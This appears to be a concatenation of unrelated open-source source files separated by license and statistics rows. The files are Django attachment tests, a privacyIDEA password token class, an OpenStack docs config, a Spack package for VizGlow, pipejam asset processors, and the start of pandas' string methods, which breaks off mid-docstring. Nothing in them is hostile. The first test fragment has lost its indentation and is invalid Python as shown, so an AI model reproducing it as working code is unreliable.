return {'paperclip.add_attachment': False}.get(p, True)
self.user.is_anonymous = mock.MagicMock(return_value=False)
self.user.has_perm = mock.MagicMock(side_effect=user_perms)
self.object = DummyModel.objects.create()
def createRequest(self):
request = RequestFactory().get('/dummy')
request.session = {}
request.user = self.user
return request
def createAttachment(self, obj):
uploaded = SimpleUploadedFile('file.odt',
'*' * 128,
content_type='application/vnd.oasis.opendocument.text')
kwargs = {
'content_type': ContentType.objects.get_for_model(obj),
'object_id': obj.pk,
'filetype': FileType.objects.create(),
'creator': self.user,
'title': "Attachment title",
'legend': "Attachment legend",
'attachment_file': uploaded
}
return Attachment.objects.create(**kwargs)
def test_list_attachments_in_details(self):
self.createAttachment(self.object)
request = self.createRequest()
view = MapEntityDetail.as_view(model=DummyModel,
template_name="mapentity/mapentity_detail.html")
response = view(request, pk=self.object.pk)
html = unicode(response.render())
self.assertTemplateUsed(response, template_name='paperclip/attachment_list.html')
self.assertEqual(1, len(Attachment.objects.attachments_for_object(self.object)))
self.assertNotIn("Submit attachment", html)
for attachment in Attachment.objects.attachments_for_object(self.object):
self.assertIn(attachment.legend, html)
self.assertIn(attachment.title, html)
self.assertIn(attachment.attachment_file.url, html)
self.assertIn('paperclip/fileicons/odt.png', html)
def test_upload_form_in_details_if_perms(self):
self.user.has_perm = mock.MagicMock(return_value=True)
view = MapEntityDetail.as_view(model=DummyModel,
template_name="mapentity/mapentity_detail.html")
request = self.createRequest()
response = view(request, pk=self.object.pk)
html = unicode(response.render())
self.assertIn("Submit attachment", html)
self.assertIn("""<form action="/paperclip/add-for/tests/dummymodel/1/""", html)
class UploadAttachmentTestCase(TestCase):
def setUp(self):
self.object = DummyModel.objects.create()
user = User.objects.create_user('aah', '[email protected]', 'booh')
user.is_superuser = True
user.save()
success = self.client.login(username=user.username, password='booh')
self.assertTrue(success)
def attachmentPostData(self):
filetype = FileType.objects.create()
uploaded = SimpleUploadedFile('face.jpg',
'*' * 128,
content_type='image/jpeg')
data = {
'filetype': filetype.pk,
'title': 'A title',
'legend': 'A legend',
'attachment_file': uploaded,
'next': self.object.get_detail_url()
}
return data
def test_upload_redirects_to_dummy_detail_url(self):
response = self.client.post(add_url_for_obj(self.object),
data=self.attachmentPostData())
self.assertEqual(response.status_code, 302)
self.assertEqual(response['location'],
'http://testserver/dummymodel/%s/' % self.object.pk)
def test_upload_creates_attachment(self):
data = self.attachmentPostData()
self.client.post(add_url_for_obj(self.object), data=data)
att = Attachment.objects.attachments_for_object(self.object).get()
self.assertEqual(att.title, data['title'])
self.assertEqual(att.legend, data['legend'])
self.assertEqual(att.filetype.pk, data['filetype'])
def test_title_gives_name_to_file(self):
data = self.attachmentPostData()
self.client.post(add_url_for_obj(self.object), data=data)
att = Attachment.objects.attachments_for_object(self.object).get()
self.assertTrue('a-title' in att.attachment_file.name)
def test_filename_is_used_if_no_title(self):
data = self.attachmentPostData()
data['title'] = ''
self.client.post(add_url_for_obj(self.object), data=data)
att = Attachment.objects.attachments_for_object(self.object).get()
self.assertTrue('face' in att.attachment_file.name)
| bsd-3-clause | 8,546,535,563,439,139,000 | 38.753623 | 93 | 0.623223 | false |
jalr/privacyidea | privacyidea/lib/tokens/passwordtoken.py | 1 | 4231 | # -*- coding: utf-8 -*-
#
# privacyIDEA is a fork of LinOTP
# 2014-12-05 Cornelius Kölbel <[email protected]>
# Migration to flask
#
# May 08, 2014 Cornelius Kölbel
# License: AGPLv3
# contact: http://www.privacyidea.org
#
# Copyright (C) 2010 - 2014 LSE Leading Security Experts GmbH
# License: LSE
# contact: http://www.linotp.org
# http://www.lsexperts.de
# [email protected]
"""
This file contains the definition of the password token class
"""
import logging
from privacyidea.lib.crypto import zerome
from privacyidea.lib.tokenclass import TokenClass
from privacyidea.lib.log import log_with
from privacyidea.lib.decorators import check_token_locked
optional = True
required = False
log = logging.getLogger(__name__)
class PasswordTokenClass(TokenClass):
"""
This Token does use a fixed Password as the OTP value.
In addition, the OTP PIN can be used with this token.
This Token can be used for a scenario like losttoken
"""
class SecretPassword(object):
def __init__(self, secObj):
self.secretObject = secObj
def get_password(self):
return self.secretObject.getKey()
def check_password(self, password):
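            # Compare the supplied password with the stored secret; the key
            # material is zeroed and deleted afterwards.  Returns 0 on match
            # and -1 otherwise.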
res = -1
key = self.secretObject.getKey()
if key == password:
res = 0
zerome(key)
del key
return res
def __init__(self, aToken):
TokenClass.__init__(self, aToken)
self.hKeyRequired = True
self.set_type(u"pw")
@staticmethod
def get_class_type():
return "pw"
@staticmethod
def get_class_prefix():
return "PW"
@staticmethod
@log_with(log)
def get_class_info(key=None, ret='all'):
"""
returns a subtree of the token definition
:param key: subsection identifier
:type key: string
:param ret: default return value, if nothing is found
:type ret: user defined
:return: subsection if key exists or user defined
:rtype: dict or scalar
"""
res = {'type': 'pw',
'title': 'Password Token',
'description': ('A token with a fixed password. Can be '
'combined with the OTP PIN. Is used for the '
'lost token scenario.'),
'init': {},
'config': {},
'user': [],
# This tokentype is enrollable in the UI for...
'ui_enroll': [],
'policy': {},
}
# I don't think we need to define the lost token policies here...
if key is not None and key in res:
ret = res.get(key)
else:
if ret == 'all':
ret = res
return ret
def update(self, param):
"""
This method is called during the initialization process.
:param param: parameters from the token init
:type param: dict
:return: None
"""
"""
:param param:
:return:
"""
TokenClass.update(self, param)
self.set_otplen()
@log_with(log)
@check_token_locked
def set_otplen(self, otplen=0):
"""
sets the OTP length to the length of the password
:param otplen: This is ignored in this class
:type otplen: int
:result: None
"""
secretHOtp = self.token.get_otpkey()
sp = PasswordTokenClass.SecretPassword(secretHOtp)
pw_len = len(sp.get_password())
TokenClass.set_otplen(self, pw_len)
return
@log_with(log, log_entry=False)
@check_token_locked
def check_otp(self, anOtpVal, counter=None, window=None, options=None):
"""
This checks the static password
:param anOtpVal: This contains the "OTP" value, which is the static
password
:return: result of password check, 0 in case of success, -1 if fail
:rtype: int
"""
secretHOtp = self.token.get_otpkey()
sp = PasswordTokenClass.SecretPassword(secretHOtp)
res = sp.check_password(anOtpVal)
return res
| agpl-3.0 | -5,484,447,843,256,674,000 | 26.640523 | 77 | 0.568456 | false |
AlekhyaMallina-Vedams/openstack-manuals | doc/common/source/conf.py | 1 | 4284 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
# import sys
import openstackdocstheme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
# TODO(ajaeger): enable PDF building, for example add 'rst2pdf.pdfbuilder'
extensions = []
# Add any paths that contain templates here, relative to this directory.
# templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Common documents'
bug_tag = u'common'
copyright = u'2015-2016, OpenStack contributors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0.0'
# The full version, including alpha/beta/rc tags.
release = '1.0.0'
# A few variables have to be set for the log-a-bug feature.
# giturl: The location of conf.py on Git. Must be set manually.
# gitsha: The SHA checksum of the bug description. Automatically extracted from git log.
# bug_tag: Tag for categorizing the bug. Must be set manually.
# These variables are passed to the logabug code via html_context.
giturl = u'http://git.openstack.org/cgit/openstack/openstack-manuals/tree/doc/common/source'
git_cmd = "/usr/bin/git log | head -n1 | cut -f2 -d' '"
gitsha = os.popen(git_cmd).read().strip('\n')
html_context = {"gitsha": gitsha, "bug_tag": bug_tag,
"giturl": giturl}
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# -- Options for Internationalization output ------------------------------
locale_dirs = ['locale/']
| apache-2.0 | 622,890,007,791,508,100 | 34.114754 | 92 | 0.721522 | false |
skosukhin/spack | var/spack/repos/builtin/packages/vizglow/package.py | 1 | 4498 | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
import glob
import os
class Vizglow(Package):
"""VizGlow software tool is used for high-fidelity multi-dimensional
modeling of non-equilibrium plasma discharges.
Note: VizGlow is licensed software. You will need to create an account on
the EsgeeTech homepage and download VizGlow yourself. Spack will search
your current directory for a file of this format. Alternatively, add this
file to a mirror so that Spack can find it. For instructions on how to
set up a mirror, see http://spack.readthedocs.io/en/latest/mirrors.html"""
homepage = "http://esgeetech.com/products/vizglow-plasma-modeling/"
version('2.2alpha20', '2bef890c66f3a44aaf96f7c96788c89e', expand=False,
url="file://{0}/VizGlow_v2.2alpha20-Linux-x86_64-R09December2016-Install".format(os.getcwd()))
version('2.2alpha17', '1de268564363e0ee86f9ffff1c3b82e1', expand=False,
url="file://{0}/VizGlow_v2.2alpha17-R21November2016-Linux-x86_64-Install".format(os.getcwd()))
version('2.2alpha15', 'be2b5044f30f2b2c3bbe87a0037bf228', expand=False,
url="file://{0}/VizGlow_v2.2alpha15-Linux-x86_64-R31October2016-Install".format(os.getcwd()))
# depends_on('mesa') # TODO: mesa build doesn't work for me
depends_on('zlib')
depends_on('freetype')
depends_on('fontconfig')
depends_on('libxrender')
depends_on('xterm')
# Can't get mozjs to build, packagekit -> polkit -> mozjs
# depends_on('packagekit+gtk')
depends_on('libcanberra+gtk')
# Licensing
license_required = True
license_comment = '#'
license_files = ['esgeelm.lic']
license_vars = ['ESGEE_LICENSE_FILE']
def configure(self, prefix):
# Dictionary of responses
responses = {
'CreateDesktopShortcut': 'No',
'CreateQuickLaunchShortcut': 'No',
'InstallDir': prefix
}
# Write response file
with open('spack-responses.txt', 'w') as response_file:
for key in responses:
response_file.write('{0}: {1}\n'.format(key, responses[key]))
def install(self, spec, prefix):
self.configure(prefix)
installer = glob.glob('VizGlow*Install')[0]
chmod = which('chmod')
chmod('+x', installer)
installer = Executable(installer)
installer('--mode', 'silent', '--response-file', 'spack-responses.txt')
self.filter_ld_library_path(spec, prefix)
def filter_ld_library_path(self, spec, prefix):
"""Run after install to inject dependencies into LD_LIBRARY_PATH.
If we don't do this, the run files will clear the LD_LIBRARY_PATH.
Since the installer is a binary file, we have no means of specifying
an RPATH to use."""
files = glob.glob(prefix + '/binaries/*.run')
ld_library_path = ':'.join([
spec['zlib'].prefix.lib,
spec['freetype'].prefix.lib,
spec['fontconfig'].prefix.lib,
spec['libxrender'].prefix.lib,
spec['libcanberra'].prefix.lib
])
for runfile in files:
filter_file('(export LD_LIBRARY_PATH=)$',
r'\1{0}'.format(ld_library_path),
runfile)
| lgpl-2.1 | -3,512,128,012,529,714,700 | 39.522523 | 106 | 0.642952 | false |
ariovistus/django-pipejam | pipejam/processors.py | 1 | 3467 |
from importlib import import_module
from toposort import toposort_flatten
import os.path
from django.conf import settings
from django.utils.html import escape
from django.contrib.staticfiles.templatetags.staticfiles import static
from django.core.exceptions import ImproperlyConfigured
from django.template.loader import render_to_string
from django.template import Context
class Processor(object):
def __init__(self, config):
self.config = config
def _lookup_namespace_config(namespace):
return getattr(settings, 'PIPELINE_' + namespace.upper(), {})
class AssetRegistry(object):
def __init__(self):
self.processor_config = getattr(settings,'PIPEJAM_PROCESSORS')
self.namespaces = self.processor_config.keys()
self.config = dict([(nm, _lookup_namespace_config(nm)) for nm in self.namespaces])
self.assets = dict([(nm, dict()) for nm in self.namespaces])
def _lookup_bundle(self, bundlename):
for namespace, config in self.config.items():
if bundlename in config:
yield (bundlename, namespace)
def _load_deps(self, bundlename, namespace):
if not namespace:
for bundlename1, namespace1 in self._lookup_bundle(bundlename):
self._load_deps(bundlename, namespace1)
else:
if bundlename not in self.assets[namespace]:
                bundleconfig = self.config[namespace][bundlename]
deps = set()
for dep0 in bundleconfig.get('deps', []):
if isinstance(dep0, tuple):
deps.add(dep0)
else:
for dep in self._lookup_bundle(dep0):
deps.add(dep)
self.assets[namespace][bundlename] = set(dep for dep in deps if dep[1] == namespace)
for bundlename1, namespace1 in deps:
self._load_deps(bundlename1, namespace1)
def add_asset_reference(self, bundlename, namespace=None):
self._load_deps(bundlename, namespace)
def mode_for_file(self, filename):
_, ext = os.path.splitext(filename)
mode = ext.lstrip('.')
return self.mode_map.get(mode, mode)
def get_processor(self, namespace):
config = self.processor_config[namespace]
mod, cls = config['processor'].rsplit('.', 1)
module = import_module(mod)
return getattr(module, cls)(config)
def render(self, context, namespace):
result = []
asset_map = dict((key, set(str(value[0]) for value in depset)) for (key,depset) in self.assets[namespace].items())
assets = toposort_flatten(asset_map)
processor = self.get_processor(namespace)
for asset in assets:
result.extend(processor.render(context, asset, self.config[namespace][asset], self.processor_config[namespace]))
return result
#
# Default processors
#
class PipelineScriptProcessor(Processor):
def render(self, context, bundlename, config, processor_config):
from pipeline.templatetags.compressed import CompressedJSNode
return CompressedJSNode("'{0}'".format(bundlename)).render(context)
class PipelineStylesheetProcessor(Processor):
def render(self, context, bundlename, config, processor_config):
from pipeline.templatetags.compressed import CompressedCSSNode
return CompressedCSSNode("'{0}'".format(bundlename)).render(context)
| bsd-2-clause | -5,160,865,482,003,992,000 | 35.494737 | 124 | 0.649841 | false |
kushalbhola/MyStuff | Practice/PythonApplication/env/Lib/site-packages/pandas/core/strings.py | 1 | 105891 | import codecs
from functools import wraps
import re
import textwrap
from typing import Dict, List
import warnings
import numpy as np
import pandas._libs.lib as lib
import pandas._libs.ops as libops
from pandas.util._decorators import Appender, deprecate_kwarg
from pandas.core.dtypes.common import (
ensure_object,
is_bool_dtype,
is_categorical_dtype,
is_integer,
is_list_like,
is_re,
is_scalar,
is_string_like,
)
from pandas.core.dtypes.generic import ABCIndexClass, ABCMultiIndex, ABCSeries
from pandas.core.dtypes.missing import isna
from pandas.core.algorithms import take_1d
from pandas.core.base import NoNewAttributesMixin
import pandas.core.common as com
_cpython_optimized_encoders = (
"utf-8",
"utf8",
"latin-1",
"latin1",
"iso-8859-1",
"mbcs",
"ascii",
)
_cpython_optimized_decoders = _cpython_optimized_encoders + ("utf-16", "utf-32")
_shared_docs = dict() # type: Dict[str, str]
def cat_core(list_of_columns: List, sep: str):
"""
Auxiliary function for :meth:`str.cat`
Parameters
----------
list_of_columns : list of numpy arrays
List of arrays to be concatenated with sep;
these arrays may not contain NaNs!
sep : string
The separator string for concatenating the columns
Returns
-------
nd.array
The concatenation of list_of_columns with sep
"""
list_with_sep = [sep] * (2 * len(list_of_columns) - 1)
list_with_sep[::2] = list_of_columns
return np.sum(list_with_sep, axis=0)
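# For example, cat_core([array(['a', 'b']), array(['1', '2'])], '-') with
# object-dtype inputs (as required above) produces the elementwise
# concatenation ['a-1', 'b-2'].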
def cat_safe(list_of_columns: List, sep: str):
"""
Auxiliary function for :meth:`str.cat`.
Same signature as cat_core, but handles TypeErrors in concatenation, which
happen if the arrays in list_of columns have the wrong dtypes or content.
Parameters
----------
list_of_columns : list of numpy arrays
List of arrays to be concatenated with sep;
these arrays may not contain NaNs!
sep : string
The separator string for concatenating the columns
Returns
-------
nd.array
The concatenation of list_of_columns with sep
"""
try:
result = cat_core(list_of_columns, sep)
except TypeError:
# if there are any non-string values (wrong dtype or hidden behind
# object dtype), np.sum will fail; catch and return with better message
for column in list_of_columns:
dtype = lib.infer_dtype(column, skipna=True)
if dtype not in ["string", "empty"]:
raise TypeError(
"Concatenation requires list-likes containing only "
"strings (or missing values). Offending values found in "
"column {}".format(dtype)
) from None
return result
def _na_map(f, arr, na_result=np.nan, dtype=object):
# should really _check_ for NA
return _map(f, arr, na_mask=True, na_value=na_result, dtype=dtype)
def _map(f, arr, na_mask=False, na_value=np.nan, dtype=object):
if not len(arr):
return np.ndarray(0, dtype=dtype)
if isinstance(arr, ABCSeries):
arr = arr.values
if not isinstance(arr, np.ndarray):
arr = np.asarray(arr, dtype=object)
if na_mask:
mask = isna(arr)
try:
convert = not all(mask)
result = lib.map_infer_mask(arr, f, mask.view(np.uint8), convert)
except (TypeError, AttributeError) as e:
# Reraise the exception if callable `f` got wrong number of args.
# The user may want to be warned by this, instead of getting NaN
p_err = (
r"((takes)|(missing)) (?(2)from \d+ to )?\d+ "
r"(?(3)required )positional arguments?"
)
if len(e.args) >= 1 and re.search(p_err, e.args[0]):
raise e
def g(x):
try:
return f(x)
except (TypeError, AttributeError):
return na_value
return _map(g, arr, dtype=dtype)
if na_value is not np.nan:
np.putmask(result, mask, na_value)
if result.dtype == object:
result = lib.maybe_convert_objects(result)
return result
else:
return lib.map_infer(arr, f)
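# For example, _na_map(str.upper, np.array(['a', np.nan, 'b'], dtype=object))
# applies the function only where the isna() mask is False, giving
# ['A', nan, 'B'] instead of raising on the missing value.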
def str_count(arr, pat, flags=0):
"""
Count occurrences of pattern in each string of the Series/Index.
This function is used to count the number of times a particular regex
pattern is repeated in each of the string elements of the
:class:`~pandas.Series`.
Parameters
----------
pat : str
Valid regular expression.
flags : int, default 0, meaning no flags
Flags for the `re` module. For a complete list, `see here
<https://docs.python.org/3/howto/regex.html#compilation-flags>`_.
**kwargs
For compatibility with other string methods. Not used.
Returns
-------
Series or Index
Same type as the calling object containing the integer counts.
See Also
--------
re : Standard library module for regular expressions.
str.count : Standard library version, without regular expression support.
Notes
-----
Some characters need to be escaped when passing in `pat`.
eg. ``'$'`` has a special meaning in regex and must be escaped when
finding this literal character.
Examples
--------
>>> s = pd.Series(['A', 'B', 'Aaba', 'Baca', np.nan, 'CABA', 'cat'])
>>> s.str.count('a')
0 0.0
1 0.0
2 2.0
3 2.0
4 NaN
5 0.0
6 1.0
dtype: float64
Escape ``'$'`` to find the literal dollar sign.
>>> s = pd.Series(['$', 'B', 'Aab$', '$$ca', 'C$B$', 'cat'])
>>> s.str.count('\\$')
0 1
1 0
2 1
3 2
4 2
5 0
dtype: int64
This is also available on Index
>>> pd.Index(['A', 'A', 'Aaba', 'cat']).str.count('a')
Int64Index([0, 0, 2, 1], dtype='int64')
"""
regex = re.compile(pat, flags=flags)
f = lambda x: len(regex.findall(x))
return _na_map(f, arr, dtype=int)
def str_contains(arr, pat, case=True, flags=0, na=np.nan, regex=True):
"""
Test if pattern or regex is contained within a string of a Series or Index.
Return boolean Series or Index based on whether a given pattern or regex is
contained within a string of a Series or Index.
Parameters
----------
pat : str
Character sequence or regular expression.
case : bool, default True
If True, case sensitive.
flags : int, default 0 (no flags)
Flags to pass through to the re module, e.g. re.IGNORECASE.
na : default NaN
Fill value for missing values.
regex : bool, default True
If True, assumes the pat is a regular expression.
If False, treats the pat as a literal string.
Returns
-------
Series or Index of boolean values
A Series or Index of boolean values indicating whether the
given pattern is contained within the string of each element
of the Series or Index.
See Also
--------
match : Analogous, but stricter, relying on re.match instead of re.search.
Series.str.startswith : Test if the start of each string element matches a
pattern.
Series.str.endswith : Same as startswith, but tests the end of string.
Examples
--------
Returning a Series of booleans using only a literal pattern.
>>> s1 = pd.Series(['Mouse', 'dog', 'house and parrot', '23', np.NaN])
>>> s1.str.contains('og', regex=False)
0 False
1 True
2 False
3 False
4 NaN
dtype: object
Returning an Index of booleans using only a literal pattern.
>>> ind = pd.Index(['Mouse', 'dog', 'house and parrot', '23.0', np.NaN])
>>> ind.str.contains('23', regex=False)
Index([False, False, False, True, nan], dtype='object')
Specifying case sensitivity using `case`.
>>> s1.str.contains('oG', case=True, regex=True)
0 False
1 False
2 False
3 False
4 NaN
dtype: object
Specifying `na` to be `False` instead of `NaN` replaces NaN values
with `False`. If Series or Index does not contain NaN values
the resultant dtype will be `bool`, otherwise, an `object` dtype.
>>> s1.str.contains('og', na=False, regex=True)
0 False
1 True
2 False
3 False
4 False
dtype: bool
Returning 'house' or 'dog' when either expression occurs in a string.
>>> s1.str.contains('house|dog', regex=True)
0 False
1 True
2 True
3 False
4 NaN
dtype: object
Ignoring case sensitivity using `flags` with regex.
>>> import re
>>> s1.str.contains('PARROT', flags=re.IGNORECASE, regex=True)
0 False
1 False
2 True
3 False
4 NaN
dtype: object
Returning any digit using regular expression.
>>> s1.str.contains('\\d', regex=True)
0 False
1 False
2 False
3 True
4 NaN
dtype: object
Ensure `pat` is a not a literal pattern when `regex` is set to True.
Note in the following example one might expect only `s2[1]` and `s2[3]` to
return `True`. However, '.0' as a regex matches any character
followed by a 0.
>>> s2 = pd.Series(['40', '40.0', '41', '41.0', '35'])
>>> s2.str.contains('.0', regex=True)
0 True
1 True
2 False
3 True
4 False
dtype: bool
"""
if regex:
if not case:
flags |= re.IGNORECASE
regex = re.compile(pat, flags=flags)
if regex.groups > 0:
warnings.warn(
"This pattern has match groups. To actually get the"
" groups, use str.extract.",
UserWarning,
stacklevel=3,
)
f = lambda x: bool(regex.search(x))
else:
if case:
f = lambda x: pat in x
else:
upper_pat = pat.upper()
f = lambda x: upper_pat in x
uppered = _na_map(lambda x: x.upper(), arr)
return _na_map(f, uppered, na, dtype=bool)
return _na_map(f, arr, na, dtype=bool)
def str_startswith(arr, pat, na=np.nan):
"""
Test if the start of each string element matches a pattern.
Equivalent to :meth:`str.startswith`.
Parameters
----------
pat : str
Character sequence. Regular expressions are not accepted.
na : object, default NaN
Object shown if element tested is not a string.
Returns
-------
Series or Index of bool
A Series of booleans indicating whether the given pattern matches
the start of each string element.
See Also
--------
str.startswith : Python standard library string method.
Series.str.endswith : Same as startswith, but tests the end of string.
Series.str.contains : Tests if string element contains a pattern.
Examples
--------
>>> s = pd.Series(['bat', 'Bear', 'cat', np.nan])
>>> s
0 bat
1 Bear
2 cat
3 NaN
dtype: object
>>> s.str.startswith('b')
0 True
1 False
2 False
3 NaN
dtype: object
Specifying `na` to be `False` instead of `NaN`.
>>> s.str.startswith('b', na=False)
0 True
1 False
2 False
3 False
dtype: bool
"""
f = lambda x: x.startswith(pat)
return _na_map(f, arr, na, dtype=bool)
def str_endswith(arr, pat, na=np.nan):
"""
Test if the end of each string element matches a pattern.
Equivalent to :meth:`str.endswith`.
Parameters
----------
pat : str
Character sequence. Regular expressions are not accepted.
na : object, default NaN
Object shown if element tested is not a string.
Returns
-------
Series or Index of bool
A Series of booleans indicating whether the given pattern matches
the end of each string element.
See Also
--------
str.endswith : Python standard library string method.
Series.str.startswith : Same as endswith, but tests the start of string.
Series.str.contains : Tests if string element contains a pattern.
Examples
--------
>>> s = pd.Series(['bat', 'bear', 'caT', np.nan])
>>> s
0 bat
1 bear
2 caT
3 NaN
dtype: object
>>> s.str.endswith('t')
0 True
1 False
2 False
3 NaN
dtype: object
Specifying `na` to be `False` instead of `NaN`.
>>> s.str.endswith('t', na=False)
0 True
1 False
2 False
3 False
dtype: bool
"""
f = lambda x: x.endswith(pat)
return _na_map(f, arr, na, dtype=bool)
def str_replace(arr, pat, repl, n=-1, case=None, flags=0, regex=True):
r"""
Replace occurrences of pattern/regex in the Series/Index with
some other string. Equivalent to :meth:`str.replace` or
:func:`re.sub`.
Parameters
----------
pat : str or compiled regex
String can be a character sequence or regular expression.
.. versionadded:: 0.20.0
`pat` also accepts a compiled regex.
repl : str or callable
Replacement string or a callable. The callable is passed the regex
match object and must return a replacement string to be used.
See :func:`re.sub`.
.. versionadded:: 0.20.0
`repl` also accepts a callable.
n : int, default -1 (all)
Number of replacements to make from start.
case : bool, default None
- If True, case sensitive (the default if `pat` is a string)
- Set to False for case insensitive
- Cannot be set if `pat` is a compiled regex
flags : int, default 0 (no flags)
- re module flags, e.g. re.IGNORECASE
- Cannot be set if `pat` is a compiled regex
regex : bool, default True
- If True, assumes the passed-in pattern is a regular expression.
- If False, treats the pattern as a literal string
- Cannot be set to False if `pat` is a compiled regex or `repl` is
a callable.
.. versionadded:: 0.23.0
Returns
-------
Series or Index of object
A copy of the object with all matching occurrences of `pat` replaced by
`repl`.
Raises
------
ValueError
* if `regex` is False and `repl` is a callable or `pat` is a compiled
regex
* if `pat` is a compiled regex and `case` or `flags` is set
Notes
-----
When `pat` is a compiled regex, all flags should be included in the
compiled regex. Use of `case`, `flags`, or `regex=False` with a compiled
regex will raise an error.
Examples
--------
When `pat` is a string and `regex` is True (the default), the given `pat`
is compiled as a regex. When `repl` is a string, it replaces matching
regex patterns as with :meth:`re.sub`. NaN value(s) in the Series are
left as is:
>>> pd.Series(['foo', 'fuz', np.nan]).str.replace('f.', 'ba', regex=True)
0 bao
1 baz
2 NaN
dtype: object
When `pat` is a string and `regex` is False, every `pat` is replaced with
`repl` as with :meth:`str.replace`:
>>> pd.Series(['f.o', 'fuz', np.nan]).str.replace('f.', 'ba', regex=False)
0 bao
1 fuz
2 NaN
dtype: object
When `repl` is a callable, it is called on every `pat` using
:func:`re.sub`. The callable should expect one positional argument
(a regex object) and return a string.
To get the idea:
>>> pd.Series(['foo', 'fuz', np.nan]).str.replace('f', repr)
0 <_sre.SRE_Match object; span=(0, 1), match='f'>oo
1 <_sre.SRE_Match object; span=(0, 1), match='f'>uz
2 NaN
dtype: object
Reverse every lowercase alphabetic word:
>>> repl = lambda m: m.group(0)[::-1]
>>> pd.Series(['foo 123', 'bar baz', np.nan]).str.replace(r'[a-z]+', repl)
0 oof 123
1 rab zab
2 NaN
dtype: object
Using regex groups (extract second group and swap case):
>>> pat = r"(?P<one>\w+) (?P<two>\w+) (?P<three>\w+)"
>>> repl = lambda m: m.group('two').swapcase()
>>> pd.Series(['One Two Three', 'Foo Bar Baz']).str.replace(pat, repl)
0 tWO
1 bAR
dtype: object
Using a compiled regex with flags
>>> import re
>>> regex_pat = re.compile(r'FUZ', flags=re.IGNORECASE)
>>> pd.Series(['foo', 'fuz', np.nan]).str.replace(regex_pat, 'bar')
0 foo
1 bar
2 NaN
dtype: object
"""
# Check whether repl is valid (GH 13438, GH 15055)
if not (is_string_like(repl) or callable(repl)):
raise TypeError("repl must be a string or callable")
is_compiled_re = is_re(pat)
if regex:
if is_compiled_re:
if (case is not None) or (flags != 0):
raise ValueError(
"case and flags cannot be set" " when pat is a compiled regex"
)
else:
# not a compiled regex
# set default case
if case is None:
case = True
# add case flag, if provided
if case is False:
flags |= re.IGNORECASE
if is_compiled_re or len(pat) > 1 or flags or callable(repl):
n = n if n >= 0 else 0
compiled = re.compile(pat, flags=flags)
f = lambda x: compiled.sub(repl=repl, string=x, count=n)
else:
f = lambda x: x.replace(pat, repl, n)
else:
if is_compiled_re:
raise ValueError(
"Cannot use a compiled regex as replacement " "pattern with regex=False"
)
if callable(repl):
raise ValueError("Cannot use a callable replacement when " "regex=False")
f = lambda x: x.replace(pat, repl, n)
return _na_map(f, arr)
def str_repeat(arr, repeats):
"""
Duplicate each string in the Series or Index.
Parameters
----------
repeats : int or sequence of int
Same value for all (int) or different value per (sequence).
Returns
-------
Series or Index of object
Series or Index of repeated string objects specified by
input parameter repeats.
Examples
--------
>>> s = pd.Series(['a', 'b', 'c'])
>>> s
0 a
1 b
2 c
dtype: object
Single int repeats string in Series
>>> s.str.repeat(repeats=2)
0 aa
1 bb
2 cc
dtype: object
Sequence of int repeats corresponding string in Series
>>> s.str.repeat(repeats=[1, 2, 3])
0 a
1 bb
2 ccc
dtype: object
"""
if is_scalar(repeats):
def scalar_rep(x):
try:
return bytes.__mul__(x, repeats)
except TypeError:
return str.__mul__(x, repeats)
return _na_map(scalar_rep, arr)
else:
def rep(x, r):
try:
return bytes.__mul__(x, r)
except TypeError:
return str.__mul__(x, r)
repeats = np.asarray(repeats, dtype=object)
result = libops.vec_binop(com.values_from_object(arr), repeats, rep)
return result
def str_match(arr, pat, case=True, flags=0, na=np.nan):
"""
Determine if each string matches a regular expression.
Parameters
----------
pat : str
Character sequence or regular expression.
case : bool, default True
If True, case sensitive.
flags : int, default 0 (no flags)
